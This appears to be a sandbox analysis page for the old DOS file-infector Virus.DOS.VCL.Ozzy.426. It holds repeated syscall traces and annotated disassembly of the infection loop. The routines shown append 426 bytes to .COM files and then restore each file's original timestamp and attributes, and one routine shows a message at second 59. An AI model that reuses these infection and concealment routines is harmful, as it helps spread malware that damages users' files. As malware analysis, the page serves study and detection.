Sample viewer

vx.netlux.org/Virus.DOS.VCL.Ozzy.426


Syscalls:

Time Syscall Op Syscall Name
2018-12-17T23:03:14.17345773Z 71 PC: 12a63 | Get current directory
2018-12-17T23:03:14.177381118Z 26 PC: 12b2f | Set disk transfer address
2018-12-17T23:03:14.179756364Z 78 PC: 12a84 | Find first file
2018-12-17T23:03:14.186674299Z 67 PC: 12aa1 | Get or set file attributes
2018-12-17T23:03:14.207685816Z 61 PC: 12aaa | Open file (Filename = 'SLEEP.COM')
2018-12-17T23:03:14.215811026Z 63 PC: 12ab6 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:03:14.223081938Z 66 PC: 12b37 | Move file pointer
2018-12-17T23:03:14.224475473Z 64 PC: 12ae0 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:03:14.227529383Z 66 PC: 12b37 | Move file pointer
; Post-infection cleanup, disassembled from the return address of Get time (INT 21h AH=2Ch, DH = seconds).
; Per host file the trace shows a 3-byte and a 426-byte write, after which the stored date/time and attribute
; values are written back; size and content hashes, not the modification time, are what visibly change.
2018-12-17T23:03:14.229210002Z 44 PC: 12ae9 | Get time 0x12ae9: cmp dh, 0
0x12aec: je 0x12ae5                         ; seconds == 0: branch back (target precedes this listing; presumably re-reads the clock - confirm)
0x12aee: mov byte ptr cs:[bp + 0x292], dh   ; keep the non-zero seconds byte in BP-relative virus data
                                            ; NOTE(review): possibly a per-copy key used by 0x12b6c - confirm
0x12af3: call 0x12b6c                       ; the 426-byte write (PC 12c71) is logged before this call returns
0x12af6: mov ax, 0x5701                     ; INT 21h AX=5701h: set file date and time
0x12af9: mov dx, word ptr cs:[bp + 0x31c]   ; DX = stored date word
0x12afe: mov cx, word ptr cs:[bp + 0x31a]   ; CX = stored time word (presumably the host's original stamp - confirm)
0x12b03: int 0x21                           ; logged as "Get or set file date and time" at PC 12b05
0x12b05: mov ah, 0x3e                       ; INT 21h AH=3Eh: close file
0x12b07: int 0x21
0x12b09: mov ax, 0x4301                     ; INT 21h AX=4301h: set file attributes
0x12b0c: lea dx, word ptr [bp + 0x2cd]      ; DX -> file name buffer in virus data
0x12b10: xor ch, ch
0x12b12: mov cl, byte ptr cs:[bp + 0x319]   ; CX = stored attribute byte, zero-extended
0x12b17: int 0x21                           ; logged as "Get or set file attributes" at PC 12b19
0x12b19: mov ah, 0x4f                       ; INT 21h AH=4Fh: find next file
0x12b1b: jmp 0x12a82                        ; back into the search loop (Find first/next rows are logged at PC 12a84)
; The lines below are not fall-through from the jmp; the linear disassembly simply continues into another path.
0x12b1e: lea dx, word ptr [bp + 0x2da]      ; DX -> directory path buffer
0x12b22: mov ah, 0x3b                       ; INT 21h AH=3Bh: change current directory
0x12b24: int 0x21
2018-12-17T23:03:14.231858849Z 64 PC: 12c71 | Write file or device (Write 426 bytes on handle 5)
2018-12-17T23:03:14.240986547Z 87 PC: 12b05 | Get or set file date and time
2018-12-17T23:03:14.243701557Z 62 PC: 12b09 | Close file
2018-12-17T23:03:14.252430306Z 67 PC: 12b19 | Get or set file attributes
2018-12-17T23:03:14.263977568Z 79 PC: 12a84 | Find next file
2018-12-17T23:03:14.267849711Z 67 PC: 12aa1 | Get or set file attributes
2018-12-17T23:03:14.279456506Z 61 PC: 12aaa | Open file (Filename = 'PRINT.COM')
2018-12-17T23:03:14.288004211Z 63 PC: 12ab6 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:03:14.296275961Z 66 PC: 12b37 | Move file pointer
2018-12-17T23:03:14.298161027Z 64 PC: 12ae0 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:03:14.301425749Z 66 PC: 12b37 | Move file pointer
; Post-infection cleanup, disassembled from the return address of Get time (INT 21h AH=2Ch, DH = seconds).
; Per host file the trace shows a 3-byte and a 426-byte write, after which the stored date/time and attribute
; values are written back; size and content hashes, not the modification time, are what visibly change.
2018-12-17T23:03:14.304019932Z 44 PC: 12ae9 | Get time 0x12ae9: cmp dh, 0
0x12aec: je 0x12ae5                         ; seconds == 0: branch back (target precedes this listing; presumably re-reads the clock - confirm)
0x12aee: mov byte ptr cs:[bp + 0x292], dh   ; keep the non-zero seconds byte in BP-relative virus data
                                            ; NOTE(review): possibly a per-copy key used by 0x12b6c - confirm
0x12af3: call 0x12b6c                       ; the 426-byte write (PC 12c71) is logged before this call returns
0x12af6: mov ax, 0x5701                     ; INT 21h AX=5701h: set file date and time
0x12af9: mov dx, word ptr cs:[bp + 0x31c]   ; DX = stored date word
0x12afe: mov cx, word ptr cs:[bp + 0x31a]   ; CX = stored time word (presumably the host's original stamp - confirm)
0x12b03: int 0x21                           ; logged as "Get or set file date and time" at PC 12b05
0x12b05: mov ah, 0x3e                       ; INT 21h AH=3Eh: close file
0x12b07: int 0x21
0x12b09: mov ax, 0x4301                     ; INT 21h AX=4301h: set file attributes
0x12b0c: lea dx, word ptr [bp + 0x2cd]      ; DX -> file name buffer in virus data
0x12b10: xor ch, ch
0x12b12: mov cl, byte ptr cs:[bp + 0x319]   ; CX = stored attribute byte, zero-extended
0x12b17: int 0x21                           ; logged as "Get or set file attributes" at PC 12b19
0x12b19: mov ah, 0x4f                       ; INT 21h AH=4Fh: find next file
0x12b1b: jmp 0x12a82                        ; back into the search loop (Find first/next rows are logged at PC 12a84)
; The lines below are not fall-through from the jmp; the linear disassembly simply continues into another path.
0x12b1e: lea dx, word ptr [bp + 0x2da]      ; DX -> directory path buffer
0x12b22: mov ah, 0x3b                       ; INT 21h AH=3Bh: change current directory
0x12b24: int 0x21
2018-12-17T23:03:14.306950278Z 64 PC: 12c71 | Write file or device (Write 426 bytes on handle 5)
2018-12-17T23:03:14.310544775Z 87 PC: 12b05 | Get or set file date and time
2018-12-17T23:03:14.313148451Z 62 PC: 12b09 | Close file
2018-12-17T23:03:14.32169044Z 67 PC: 12b19 | Get or set file attributes
2018-12-17T23:03:14.33292966Z 79 PC: 12a84 | Find next file
2018-12-17T23:03:14.335364606Z 67 PC: 12aa1 | Get or set file attributes
2018-12-17T23:03:14.342556849Z 61 PC: 12aaa | Open file (Filename = 'HELLO.COM')
2018-12-17T23:03:14.346896365Z 63 PC: 12ab6 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:03:14.351133076Z 66 PC: 12b37 | Move file pointer
2018-12-17T23:03:14.352952224Z 64 PC: 12ae0 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:03:14.355074456Z 66 PC: 12b37 | Move file pointer
; Post-infection cleanup, disassembled from the return address of Get time (INT 21h AH=2Ch, DH = seconds).
; Per host file the trace shows a 3-byte and a 426-byte write, after which the stored date/time and attribute
; values are written back; size and content hashes, not the modification time, are what visibly change.
2018-12-17T23:03:14.356641648Z 44 PC: 12ae9 | Get time 0x12ae9: cmp dh, 0
0x12aec: je 0x12ae5                         ; seconds == 0: branch back (target precedes this listing; presumably re-reads the clock - confirm)
0x12aee: mov byte ptr cs:[bp + 0x292], dh   ; keep the non-zero seconds byte in BP-relative virus data
                                            ; NOTE(review): possibly a per-copy key used by 0x12b6c - confirm
0x12af3: call 0x12b6c                       ; the 426-byte write (PC 12c71) is logged before this call returns
0x12af6: mov ax, 0x5701                     ; INT 21h AX=5701h: set file date and time
0x12af9: mov dx, word ptr cs:[bp + 0x31c]   ; DX = stored date word
0x12afe: mov cx, word ptr cs:[bp + 0x31a]   ; CX = stored time word (presumably the host's original stamp - confirm)
0x12b03: int 0x21                           ; logged as "Get or set file date and time" at PC 12b05
0x12b05: mov ah, 0x3e                       ; INT 21h AH=3Eh: close file
0x12b07: int 0x21
0x12b09: mov ax, 0x4301                     ; INT 21h AX=4301h: set file attributes
0x12b0c: lea dx, word ptr [bp + 0x2cd]      ; DX -> file name buffer in virus data
0x12b10: xor ch, ch
0x12b12: mov cl, byte ptr cs:[bp + 0x319]   ; CX = stored attribute byte, zero-extended
0x12b17: int 0x21                           ; logged as "Get or set file attributes" at PC 12b19
0x12b19: mov ah, 0x4f                       ; INT 21h AH=4Fh: find next file
0x12b1b: jmp 0x12a82                        ; back into the search loop (Find first/next rows are logged at PC 12a84)
; The lines below are not fall-through from the jmp; the linear disassembly simply continues into another path.
0x12b1e: lea dx, word ptr [bp + 0x2da]      ; DX -> directory path buffer
0x12b22: mov ah, 0x3b                       ; INT 21h AH=3Bh: change current directory
0x12b24: int 0x21
2018-12-17T23:03:14.360025387Z 64 PC: 12c71 | Write file or device (Write 426 bytes on handle 5)
2018-12-17T23:03:14.369344149Z 87 PC: 12b05 | Get or set file date and time
2018-12-17T23:03:14.37102261Z 62 PC: 12b09 | Close file
2018-12-17T23:03:14.380407049Z 67 PC: 12b19 | Get or set file attributes
2018-12-17T23:03:14.391339939Z 79 PC: 12a84 | Find next file
2018-12-17T23:03:14.394154143Z 67 PC: 12aa1 | Get or set file attributes
2018-12-17T23:03:14.408160797Z 61 PC: 12aaa | Open file (Filename = 'PHANG.COM')
2018-12-17T23:03:14.415518415Z 63 PC: 12ab6 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:03:14.422894058Z 66 PC: 12b37 | Move file pointer
2018-12-17T23:03:14.424992426Z 64 PC: 12ae0 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:03:14.439997916Z 66 PC: 12b37 | Move file pointer
; Post-infection cleanup, disassembled from the return address of Get time (INT 21h AH=2Ch, DH = seconds).
; Per host file the trace shows a 3-byte and a 426-byte write, after which the stored date/time and attribute
; values are written back; size and content hashes, not the modification time, are what visibly change.
2018-12-17T23:03:14.441651533Z 44 PC: 12ae9 | Get time 0x12ae9: cmp dh, 0
0x12aec: je 0x12ae5                         ; seconds == 0: branch back (target precedes this listing; presumably re-reads the clock - confirm)
0x12aee: mov byte ptr cs:[bp + 0x292], dh   ; keep the non-zero seconds byte in BP-relative virus data
                                            ; NOTE(review): possibly a per-copy key used by 0x12b6c - confirm
0x12af3: call 0x12b6c                       ; the 426-byte write (PC 12c71) is logged before this call returns
0x12af6: mov ax, 0x5701                     ; INT 21h AX=5701h: set file date and time
0x12af9: mov dx, word ptr cs:[bp + 0x31c]   ; DX = stored date word
0x12afe: mov cx, word ptr cs:[bp + 0x31a]   ; CX = stored time word (presumably the host's original stamp - confirm)
0x12b03: int 0x21                           ; logged as "Get or set file date and time" at PC 12b05
0x12b05: mov ah, 0x3e                       ; INT 21h AH=3Eh: close file
0x12b07: int 0x21
0x12b09: mov ax, 0x4301                     ; INT 21h AX=4301h: set file attributes
0x12b0c: lea dx, word ptr [bp + 0x2cd]      ; DX -> file name buffer in virus data
0x12b10: xor ch, ch
0x12b12: mov cl, byte ptr cs:[bp + 0x319]   ; CX = stored attribute byte, zero-extended
0x12b17: int 0x21                           ; logged as "Get or set file attributes" at PC 12b19
0x12b19: mov ah, 0x4f                       ; INT 21h AH=4Fh: find next file
0x12b1b: jmp 0x12a82                        ; back into the search loop (Find first/next rows are logged at PC 12a84)
; The lines below are not fall-through from the jmp; the linear disassembly simply continues into another path.
0x12b1e: lea dx, word ptr [bp + 0x2da]      ; DX -> directory path buffer
0x12b22: mov ah, 0x3b                       ; INT 21h AH=3Bh: change current directory
0x12b24: int 0x21
2018-12-17T23:03:14.444347385Z 64 PC: 12c71 | Write file or device (Write 426 bytes on handle 5)
2018-12-17T23:03:14.447747656Z 87 PC: 12b05 | Get or set file date and time
2018-12-17T23:03:14.449411988Z 62 PC: 12b09 | Close file
2018-12-17T23:03:14.457894545Z 67 PC: 12b19 | Get or set file attributes
2018-12-17T23:03:14.46951687Z 79 PC: 12a84 | Find next file
2018-12-17T23:03:14.472708013Z 67 PC: 12aa1 | Get or set file attributes
2018-12-17T23:03:14.48499379Z 61 PC: 12aaa | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T23:03:14.493904064Z 63 PC: 12ab6 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:03:14.501303006Z 66 PC: 12b37 | Move file pointer
2018-12-17T23:03:14.503415028Z 64 PC: 12ae0 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:03:14.507112245Z 66 PC: 12b37 | Move file pointer
; Post-infection cleanup, disassembled from the return address of Get time (INT 21h AH=2Ch, DH = seconds).
; Per host file the trace shows a 3-byte and a 426-byte write, after which the stored date/time and attribute
; values are written back; size and content hashes, not the modification time, are what visibly change.
2018-12-17T23:03:14.508722173Z 44 PC: 12ae9 | Get time 0x12ae9: cmp dh, 0
0x12aec: je 0x12ae5                         ; seconds == 0: branch back (target precedes this listing; presumably re-reads the clock - confirm)
0x12aee: mov byte ptr cs:[bp + 0x292], dh   ; keep the non-zero seconds byte in BP-relative virus data
                                            ; NOTE(review): possibly a per-copy key used by 0x12b6c - confirm
0x12af3: call 0x12b6c                       ; the 426-byte write (PC 12c71) is logged before this call returns
0x12af6: mov ax, 0x5701                     ; INT 21h AX=5701h: set file date and time
0x12af9: mov dx, word ptr cs:[bp + 0x31c]   ; DX = stored date word
0x12afe: mov cx, word ptr cs:[bp + 0x31a]   ; CX = stored time word (presumably the host's original stamp - confirm)
0x12b03: int 0x21                           ; logged as "Get or set file date and time" at PC 12b05
0x12b05: mov ah, 0x3e                       ; INT 21h AH=3Eh: close file
0x12b07: int 0x21
0x12b09: mov ax, 0x4301                     ; INT 21h AX=4301h: set file attributes
0x12b0c: lea dx, word ptr [bp + 0x2cd]      ; DX -> file name buffer in virus data
0x12b10: xor ch, ch
0x12b12: mov cl, byte ptr cs:[bp + 0x319]   ; CX = stored attribute byte, zero-extended
0x12b17: int 0x21                           ; logged as "Get or set file attributes" at PC 12b19
0x12b19: mov ah, 0x4f                       ; INT 21h AH=4Fh: find next file
0x12b1b: jmp 0x12a82                        ; back into the search loop (Find first/next rows are logged at PC 12a84)
; The lines below are not fall-through from the jmp; the linear disassembly simply continues into another path.
0x12b1e: lea dx, word ptr [bp + 0x2da]      ; DX -> directory path buffer
0x12b22: mov ah, 0x3b                       ; INT 21h AH=3Bh: change current directory
0x12b24: int 0x21
2018-12-17T23:03:14.511446383Z 64 PC: 12c71 | Write file or device (Write 426 bytes on handle 5)
2018-12-17T23:03:14.515776979Z 87 PC: 12b05 | Get or set file date and time
2018-12-17T23:03:14.517879599Z 62 PC: 12b09 | Close file
2018-12-17T23:03:14.526390414Z 67 PC: 12b19 | Get or set file attributes
2018-12-17T23:03:14.537017883Z 79 PC: 12a84 | Find next file
2018-12-17T23:03:14.539270207Z 67 PC: 12aa1 | Get or set file attributes
2018-12-17T23:03:14.546081232Z 61 PC: 12aaa | Open file (Filename = 'MANDEL.COM')
2018-12-17T23:03:14.555821993Z 63 PC: 12ab6 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:03:14.56516378Z 66 PC: 12b37 | Move file pointer
2018-12-17T23:03:14.56889358Z 64 PC: 12ae0 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:03:14.577598278Z 66 PC: 12b37 | Move file pointer
; Post-infection cleanup, disassembled from the return address of Get time (INT 21h AH=2Ch, DH = seconds).
; Per host file the trace shows a 3-byte and a 426-byte write, after which the stored date/time and attribute
; values are written back; size and content hashes, not the modification time, are what visibly change.
2018-12-17T23:03:14.57952109Z 44 PC: 12ae9 | Get time 0x12ae9: cmp dh, 0
0x12aec: je 0x12ae5                         ; seconds == 0: branch back (target precedes this listing; presumably re-reads the clock - confirm)
0x12aee: mov byte ptr cs:[bp + 0x292], dh   ; keep the non-zero seconds byte in BP-relative virus data
                                            ; NOTE(review): possibly a per-copy key used by 0x12b6c - confirm
0x12af3: call 0x12b6c                       ; the 426-byte write (PC 12c71) is logged before this call returns
0x12af6: mov ax, 0x5701                     ; INT 21h AX=5701h: set file date and time
0x12af9: mov dx, word ptr cs:[bp + 0x31c]   ; DX = stored date word
0x12afe: mov cx, word ptr cs:[bp + 0x31a]   ; CX = stored time word (presumably the host's original stamp - confirm)
0x12b03: int 0x21                           ; logged as "Get or set file date and time" at PC 12b05
0x12b05: mov ah, 0x3e                       ; INT 21h AH=3Eh: close file
0x12b07: int 0x21
0x12b09: mov ax, 0x4301                     ; INT 21h AX=4301h: set file attributes
0x12b0c: lea dx, word ptr [bp + 0x2cd]      ; DX -> file name buffer in virus data
0x12b10: xor ch, ch
0x12b12: mov cl, byte ptr cs:[bp + 0x319]   ; CX = stored attribute byte, zero-extended
0x12b17: int 0x21                           ; logged as "Get or set file attributes" at PC 12b19
0x12b19: mov ah, 0x4f                       ; INT 21h AH=4Fh: find next file
0x12b1b: jmp 0x12a82                        ; back into the search loop (Find first/next rows are logged at PC 12a84)
; The lines below are not fall-through from the jmp; the linear disassembly simply continues into another path.
0x12b1e: lea dx, word ptr [bp + 0x2da]      ; DX -> directory path buffer
0x12b22: mov ah, 0x3b                       ; INT 21h AH=3Bh: change current directory
0x12b24: int 0x21
2018-12-17T23:03:14.583680026Z 64 PC: 12c71 | Write file or device (Write 426 bytes on handle 5)
2018-12-17T23:03:14.598080144Z 87 PC: 12b05 | Get or set file date and time
2018-12-17T23:03:14.601357069Z 62 PC: 12b09 | Close file
2018-12-17T23:03:14.610282123Z 67 PC: 12b19 | Get or set file attributes
2018-12-17T23:03:14.621888982Z 79 PC: 12a84 | Find next file
2018-12-17T23:03:14.626170011Z 67 PC: 12aa1 | Get or set file attributes
2018-12-17T23:03:14.637670801Z 61 PC: 12aaa | Open file (Filename = 'PAH.COM')
2018-12-17T23:03:14.645486204Z 63 PC: 12ab6 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:03:14.654264275Z 66 PC: 12b37 | Move file pointer
2018-12-17T23:03:14.658443631Z 64 PC: 12ae0 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:03:14.664192902Z 66 PC: 12b37 | Move file pointer
; Post-infection cleanup, disassembled from the return address of Get time (INT 21h AH=2Ch, DH = seconds).
; Per host file the trace shows a 3-byte and a 426-byte write, after which the stored date/time and attribute
; values are written back; size and content hashes, not the modification time, are what visibly change.
2018-12-17T23:03:14.673793895Z 44 PC: 12ae9 | Get time 0x12ae9: cmp dh, 0
0x12aec: je 0x12ae5                         ; seconds == 0: branch back (target precedes this listing; presumably re-reads the clock - confirm)
0x12aee: mov byte ptr cs:[bp + 0x292], dh   ; keep the non-zero seconds byte in BP-relative virus data
                                            ; NOTE(review): possibly a per-copy key used by 0x12b6c - confirm
0x12af3: call 0x12b6c                       ; the 426-byte write (PC 12c71) is logged before this call returns
0x12af6: mov ax, 0x5701                     ; INT 21h AX=5701h: set file date and time
0x12af9: mov dx, word ptr cs:[bp + 0x31c]   ; DX = stored date word
0x12afe: mov cx, word ptr cs:[bp + 0x31a]   ; CX = stored time word (presumably the host's original stamp - confirm)
0x12b03: int 0x21                           ; logged as "Get or set file date and time" at PC 12b05
0x12b05: mov ah, 0x3e                       ; INT 21h AH=3Eh: close file
0x12b07: int 0x21
0x12b09: mov ax, 0x4301                     ; INT 21h AX=4301h: set file attributes
0x12b0c: lea dx, word ptr [bp + 0x2cd]      ; DX -> file name buffer in virus data
0x12b10: xor ch, ch
0x12b12: mov cl, byte ptr cs:[bp + 0x319]   ; CX = stored attribute byte, zero-extended
0x12b17: int 0x21                           ; logged as "Get or set file attributes" at PC 12b19
0x12b19: mov ah, 0x4f                       ; INT 21h AH=4Fh: find next file
0x12b1b: jmp 0x12a82                        ; back into the search loop (Find first/next rows are logged at PC 12a84)
; The lines below are not fall-through from the jmp; the linear disassembly simply continues into another path.
0x12b1e: lea dx, word ptr [bp + 0x2da]      ; DX -> directory path buffer
0x12b22: mov ah, 0x3b                       ; INT 21h AH=3Bh: change current directory
0x12b24: int 0x21
2018-12-17T23:03:14.677209891Z 64 PC: 12c71 | Write file or device (Write 426 bytes on handle 5)
2018-12-17T23:03:14.681583254Z 87 PC: 12b05 | Get or set file date and time
2018-12-17T23:03:14.685162865Z 62 PC: 12b09 | Close file
2018-12-17T23:03:14.693457644Z 67 PC: 12b19 | Get or set file attributes
2018-12-17T23:03:14.704980603Z 79 PC: 12a84 | Find next file
2018-12-17T23:03:14.709291403Z 67 PC: 12aa1 | Get or set file attributes
2018-12-17T23:03:14.720306144Z 61 PC: 12aaa | Open file (Filename = 'TEST.COM')
2018-12-17T23:03:14.728067276Z 63 PC: 12ab6 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:03:14.735786957Z 66 PC: 12b37 | Move file pointer
2018-12-17T23:03:14.738612548Z 64 PC: 12ae0 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:03:14.741957653Z 66 PC: 12b37 | Move file pointer
; Post-infection cleanup, disassembled from the return address of Get time (INT 21h AH=2Ch, DH = seconds).
; Per host file the trace shows a 3-byte and a 426-byte write, after which the stored date/time and attribute
; values are written back; size and content hashes, not the modification time, are what visibly change.
2018-12-17T23:03:14.744524835Z 44 PC: 12ae9 | Get time 0x12ae9: cmp dh, 0
0x12aec: je 0x12ae5                         ; seconds == 0: branch back (target precedes this listing; presumably re-reads the clock - confirm)
0x12aee: mov byte ptr cs:[bp + 0x292], dh   ; keep the non-zero seconds byte in BP-relative virus data
                                            ; NOTE(review): possibly a per-copy key used by 0x12b6c - confirm
0x12af3: call 0x12b6c                       ; the 426-byte write (PC 12c71) is logged before this call returns
0x12af6: mov ax, 0x5701                     ; INT 21h AX=5701h: set file date and time
0x12af9: mov dx, word ptr cs:[bp + 0x31c]   ; DX = stored date word
0x12afe: mov cx, word ptr cs:[bp + 0x31a]   ; CX = stored time word (presumably the host's original stamp - confirm)
0x12b03: int 0x21                           ; logged as "Get or set file date and time" at PC 12b05
0x12b05: mov ah, 0x3e                       ; INT 21h AH=3Eh: close file
0x12b07: int 0x21
0x12b09: mov ax, 0x4301                     ; INT 21h AX=4301h: set file attributes
0x12b0c: lea dx, word ptr [bp + 0x2cd]      ; DX -> file name buffer in virus data
0x12b10: xor ch, ch
0x12b12: mov cl, byte ptr cs:[bp + 0x319]   ; CX = stored attribute byte, zero-extended
0x12b17: int 0x21                           ; logged as "Get or set file attributes" at PC 12b19
0x12b19: mov ah, 0x4f                       ; INT 21h AH=4Fh: find next file
0x12b1b: jmp 0x12a82                        ; back into the search loop (Find first/next rows are logged at PC 12a84)
; The lines below are not fall-through from the jmp; the linear disassembly simply continues into another path.
0x12b1e: lea dx, word ptr [bp + 0x2da]      ; DX -> directory path buffer
0x12b22: mov ah, 0x3b                       ; INT 21h AH=3Bh: change current directory
0x12b24: int 0x21
2018-12-17T23:03:14.749387953Z 64 PC: 12c71 | Write file or device (Write 426 bytes on handle 5)
2018-12-17T23:03:14.759739604Z 87 PC: 12b05 | Get or set file date and time
2018-12-17T23:03:14.761457575Z 62 PC: 12b09 | Close file
2018-12-17T23:03:14.771065063Z 67 PC: 12b19 | Get or set file attributes
2018-12-17T23:03:14.782224041Z 79 PC: 12a84 | Find next file
2018-12-17T23:03:14.784975333Z 59 PC: 12a75 | Change current directory
2018-12-17T23:03:14.790312423Z 59 PC: 12b26 | Change current directory
; Time-triggered display routine, disassembled from the return address of Get time (INT 21h AH=2Ch, DH = seconds).
; The text output runs only when the seconds value is 59, so a single sandbox run will usually take the skip
; branch; the listing is cut off after `inc bl`, before any loop-back instruction.
2018-12-17T23:03:14.792485482Z 44 PC: 12b3c | Get time 0x12b3c: cmp dh, 0x3b
0x12b3f: jne 0x12b6b            ; seconds != 59 (0x3b): skip the display code
0x12b41: mov bh, 0              ; video page 0
0x12b43: mov cx, 0xf00          ; saved on the stack below; NOTE(review): looks like an outer repeat count - confirm past the listing
0x12b46: mov dh, 0xc            ; row 12
0x12b48: mov dl, 5              ; column 5
0x12b4a: mov bl, 1              ; starting text attribute
0x12b4c: push cx                ; preserve CX across the delay loop and the BIOS call
0x12b4d: mov cx, 0x100          ; 256 iterations of a push/pop busy-wait
0x12b50: push ax
0x12b51: pop ax
0x12b52: loop 0x12b50
0x12b54: push bp                ; BP is restored after the call
0x12b55: add bp, 0x25f          ; BP -> string at offset 0x25f of the virus data (ES not set in this listing)
0x12b59: mov cx, 0x2d           ; string length: 45 characters
0x12b5c: mov ah, 0x13           ; INT 10h AH=13h: write string (AL write mode is not set in this listing)
0x12b5e: int 0x10
0x12b60: pop bp
0x12b61: pop cx
0x12b62: inc bl                 ; next attribute value for the following pass

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":14467,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:40:44.584208462Z 71 PC: 12a63 | Get current directory
2018-12-25T12:40:44.587640409Z 26 PC: 12b2f | Set disk transfer address
2018-12-25T12:40:44.588831115Z 78 PC: 12a84 | Find first file
2018-12-25T12:40:44.594318557Z 67 PC: 12aa1 | Get or set file attributes
2018-12-25T12:40:44.611325732Z 61 PC: 12aaa | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:40:44.619323896Z 63 PC: 12ab6 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:40:44.624240784Z 66 PC: 12b37 | Move file pointer
2018-12-25T12:40:44.625540135Z 64 PC: 12ae0 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:40:44.628259771Z 66 PC: 12b37 | Move file pointer (See above)
; Post-infection cleanup, disassembled from the return address of Get time (INT 21h AH=2Ch, DH = seconds).
; Per host file the trace shows a 3-byte and a 426-byte write, after which the stored date/time and attribute
; values are written back; size and content hashes, not the modification time, are what visibly change.
2018-12-25T12:40:44.629437716Z 44 PC: 12ae9 | Get time 0x12ae9: cmp dh, 0
0x12aec: je 0x12ae5                         ; seconds == 0: branch back (target precedes this listing; presumably re-reads the clock - confirm)
0x12aee: mov byte ptr cs:[bp + 0x292], dh   ; keep the non-zero seconds byte in BP-relative virus data
                                            ; NOTE(review): possibly a per-copy key used by 0x12b6c - confirm
0x12af3: call 0x12b6c                       ; the 426-byte write (PC 12c71) is logged before this call returns
0x12af6: mov ax, 0x5701                     ; INT 21h AX=5701h: set file date and time
0x12af9: mov dx, word ptr cs:[bp + 0x31c]   ; DX = stored date word
0x12afe: mov cx, word ptr cs:[bp + 0x31a]   ; CX = stored time word (presumably the host's original stamp - confirm)
0x12b03: int 0x21                           ; logged as "Get or set file date and time" at PC 12b05
0x12b05: mov ah, 0x3e                       ; INT 21h AH=3Eh: close file
0x12b07: int 0x21
0x12b09: mov ax, 0x4301                     ; INT 21h AX=4301h: set file attributes
0x12b0c: lea dx, word ptr [bp + 0x2cd]      ; DX -> file name buffer in virus data
0x12b10: xor ch, ch
0x12b12: mov cl, byte ptr cs:[bp + 0x319]   ; CX = stored attribute byte, zero-extended
0x12b17: int 0x21                           ; logged as "Get or set file attributes" at PC 12b19
0x12b19: mov ah, 0x4f                       ; INT 21h AH=4Fh: find next file
0x12b1b: jmp 0x12a82                        ; back into the search loop (Find first/next rows are logged at PC 12a84)
; The lines below are not fall-through from the jmp; the linear disassembly simply continues into another path.
0x12b1e: lea dx, word ptr [bp + 0x2da]      ; DX -> directory path buffer
0x12b22: mov ah, 0x3b                       ; INT 21h AH=3Bh: change current directory
0x12b24: int 0x21
2018-12-25T12:40:44.631276391Z 64 PC: 12c71 | Write file or device (Write 426 bytes on handle 5)
2018-12-25T12:40:44.637672671Z 87 PC: 12b05 | Get or set file date and time
2018-12-25T12:40:44.638996524Z 62 PC: 12b09 | Close file
2018-12-25T12:40:44.64970335Z 67 PC: 12b19 | Get or set file attributes
2018-12-25T12:40:44.657747907Z 79 PC: 12a84 | Find next file (See above)
2018-12-25T12:40:44.660660944Z 67 PC: 12aa1 | Get or set file attributes (See above)
2018-12-25T12:40:44.671433796Z 61 PC: 12aaa | Open file (See above)
2018-12-25T12:40:44.680530025Z 63 PC: 12ab6 | Read file or device (See above)
2018-12-25T12:40:44.689767931Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:44.691419198Z 64 PC: 12ae0 | Write file or device (See above)
2018-12-25T12:40:44.694963847Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:44.696665306Z 44 PC: 12ae9 | Get time (See above)
2018-12-25T12:40:44.699770871Z 64 PC: 12c71 | Write file or device (See above)
2018-12-25T12:40:44.703058287Z 87 PC: 12b05 | Get or set file date and time (See above)
2018-12-25T12:40:44.70541783Z 62 PC: 12b09 | Close file (See above)
2018-12-25T12:40:44.713604271Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:40:44.725486558Z 79 PC: 12a84 | Find next file (See above)
2018-12-25T12:40:44.729685832Z 67 PC: 12aa1 | Get or set file attributes (See above)
2018-12-25T12:40:44.740686092Z 61 PC: 12aaa | Open file (See above)
2018-12-25T12:40:44.748329096Z 63 PC: 12ab6 | Read file or device (See above)
2018-12-25T12:40:44.756846689Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:44.758851058Z 64 PC: 12ae0 | Write file or device (See above)
2018-12-25T12:40:44.761850177Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:44.763673695Z 44 PC: 12ae9 | Get time (See above)
2018-12-25T12:40:44.766663256Z 64 PC: 12c71 | Write file or device (See above)
2018-12-25T12:40:44.775938462Z 87 PC: 12b05 | Get or set file date and time (See above)
2018-12-25T12:40:44.778339807Z 62 PC: 12b09 | Close file (See above)
2018-12-25T12:40:44.787126699Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:40:44.798227395Z 79 PC: 12a84 | Find next file (See above)
2018-12-25T12:40:44.80143774Z 67 PC: 12aa1 | Get or set file attributes (See above)
2018-12-25T12:40:44.812894137Z 61 PC: 12aaa | Open file (See above)
2018-12-25T12:40:44.821143363Z 63 PC: 12ab6 | Read file or device (See above)
2018-12-25T12:40:44.828212181Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:44.830226779Z 64 PC: 12ae0 | Write file or device (See above)
